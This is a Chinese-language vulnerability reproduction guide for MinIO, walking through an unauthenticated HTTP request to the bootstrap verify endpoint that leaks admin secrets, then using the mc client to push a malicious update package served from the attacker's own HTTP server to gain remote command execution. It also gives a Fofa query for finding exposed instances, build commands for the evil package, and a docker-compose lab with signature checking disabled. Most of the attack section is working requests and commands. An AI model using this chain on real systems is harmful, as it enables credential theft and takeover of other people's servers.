MiniO 是一个基于 Apache License v2.0 开源协议的对象存储服务。它兼容亚马逊 S3 云存储服务接口,非常适合于存储大容量非结构化的数据,例如图片、视频、日志文件、备份数据和容器/虚拟机镜像等
在集群部署的 Minio 中,未授权的攻击者可发送恶意的 HTTP 请求来获取 Minio 环境变量中的敏感信息(MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD),可能导致攻击者以管理员权限登录 Minio,分布式部署的所有用户都会受到影响,单机用户没有影响
Fofa:title="MinIO Browser" || banner="MinIO" || header="MinIO"
影响版本:RELEASE.2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z,browser 登陆页面如下
POST /minio/bootstrap/v1/verify HTTP/1.1
Host: 192.168.69.81:9000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
curl -XPOST http://192.168.186.148:9003/minio/bootstrap/v1/verify
MinIO 提供了一个非常方便的功能,可以通过 mc「MinIO客户端」进行服务器管理,通过第一步获取到管理员账号密码之后使用 mc 进行服务器升级,原理可以看这篇文章:MinIO从信息泄漏到RCE复现
首先通过 mc 连接远程的 MinIO 服务器
linux 安装 mc 命令
wget https://dl.min.io/client/mc/release/linux-amd64/mc
chmod +x ./mc
连接命令
./mc alias set myminio http://192.168.31.8:9000 minioadmin miniopassword
在执行升级命令后,默认会从官方服务器下载最新版进行升级,关键在于升级地址是可以自定义的,企业如果是内网环境可以指定自己的更新地址以便于升级
整个更新流程:验证管理员权限→获取最新版本→获取最新版本的 sha256sum 信息→下载并验证 sha256sum →验证无误后替换自身并重启,虽然sha256 我们不可控,但是用于验证的 sha256sum 文件是我们可控的,跟进相关代码可以发现,envMinisignPubKe 默认为空,导致签名校验失效,所以我们可以构造恶意升级包,最终形成RCE
恶意升级包下载地址:https://github.com/AbelChe/evil_minio,使用以下命令去生成升级所需文件,下载包会比较多需要一个良好的网络环境
evil_minio-main % CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" -trimpath && mv minio minio.RELEASE.2023-03-22T06-36-24Z && shasum -a 256 minio.RELEASE.2023-03-22T06-36-24Z > minio.RELEASE.2023-03-22T06-36-24Z.sha256sum
在生成文件目录下使用 python 启动一个简易 http 服务器,确保可以远程访问
python3 -m http.server
使用以下命令去升级 minio
mc admin update myminio http://192.168.186.1:8000/minio.RELEASE.2023-03-22T06-36-24Z.sha256sum -y
升级过程中会去访问 web 服务下载升级包,可以看到访问了两次,第一次访问 sum 文件,第二次访问升级文件
构造恶意的更新指令后提示正常更新,并且执行了我们提供的恶意程序,但是替换了恶意程序之后,原本的MinIO服务会中断,所以想要无损利用需要考虑基于源程序进行魔改,并且这个漏洞的利用与部署方式无关,只要获取到了管理员账号密码就能实现恶意升级
升级成功后可以执行任意命令
可能会遇到的问题
[not our bug] Unexpected client ‘admin’ API version found ‘v3’, expected ‘v2’, please downgrade the client to older releases
minio 版本太低无法,mc 版本太高
使用 mc update升级过程中提示「缺失minisig文件」
原因:docker启动的环境,docker环境在默认情况下存在MINIO_UPDATE_MINISIGN_PUBKEY 环境变量
解决方法:docker环境在默认情况下是无法RCE的,需要清除这个环境变量,比如在docker-compose.yml中加入
environment:
MINIO_UPDATE_MINISIGN_PUBKEY:
在没有该值的漏洞版本的情况下,可以绕过完整性检查,也就不会请求.minisig文件
参考
version: '3.7'
# starts 4 docker containers running minio server instances. Each
# minio server's web interface will be accessible on the host at port
# 9001 through 9004.
services:
minio1:
image: minio/minio:RELEASE.2022-10-20T00-55-09Z
container_name: minio1
volumes:
- data1-1:/data1
- data1-2:/data2
ports:
- "9001:9000"
environment:
MINIO_ACCESS_KEY: admin
MINIO_SECRET_KEY: admin123
MINIO_UPDATE_MINISIGN_PUBKEY:
command: server http://minio{1...4}/data{1...2}
volumes:
- /docker/minio/data:/data
- /docker/minio/config:/root/.minio/
privileged: true
restart: always
healthcheck:
test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
interval: 30s
timeout: 20s
retries: 3
minio2:
image: minio/minio:RELEASE.2022-10-20T00-55-09Z
container_name: minio2
volumes:
- data2-1:/data1
- data2-2:/data2
ports:
- "9002:9000"
environment:
MINIO_ACCESS_KEY: admin
MINIO_SECRET_KEY: admin123
MINIO_UPDATE_MINISIGN_PUBKEY:
command: server http://minio{1...4}/data{1...2}
volumes:
- /docker/minio/data:/data
- /docker/minio/config:/root/.minio/
privileged: true
restart: always
healthcheck:
test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
interval: 30s
timeout: 20s
retries: 3
minio3:
image: minio/minio:RELEASE.2022-10-20T00-55-09Z
container_name: minio3
volumes:
- data3-1:/data1
- data3-2:/data2
ports:
- "9003:9000"
environment:
MINIO_ACCESS_KEY: admin
MINIO_SECRET_KEY: admin123
MINIO_UPDATE_MINISIGN_PUBKEY:
volumes:
- /docker/minio/data:/data
- /docker/minio/config:/root/.minio/
privileged: true
restart: always
healthcheck:
test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
interval: 30s
timeout: 20s
retries: 3
minio4:
image: minio/minio:RELEASE.2022-10-20T00-55-09Z
container_name: minio4
volumes:
- data4-1:/data1
- data4-2:/data2
ports:
- "9004:9000"
environment:
MINIO_ACCESS_KEY: admin
MINIO_SECRET_KEY: admin123
MINIO_UPDATE_MINISIGN_PUBKEY:
command: server http://minio{1...4}/data{1...2}
volumes:
- /docker/minio/data:/data
- /docker/minio/config:/root/.minio/
privileged: true
restart: always
healthcheck:
test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
interval: 30s
timeout: 20s
retries: 3
## By default this config uses default local driver,
## For custom volumes replace with volume driver configuration.
volumes:
data1-1:
data1-2:
data2-1:
data2-2:
data3-1:
data3-2:
data4-1:
data4-2:
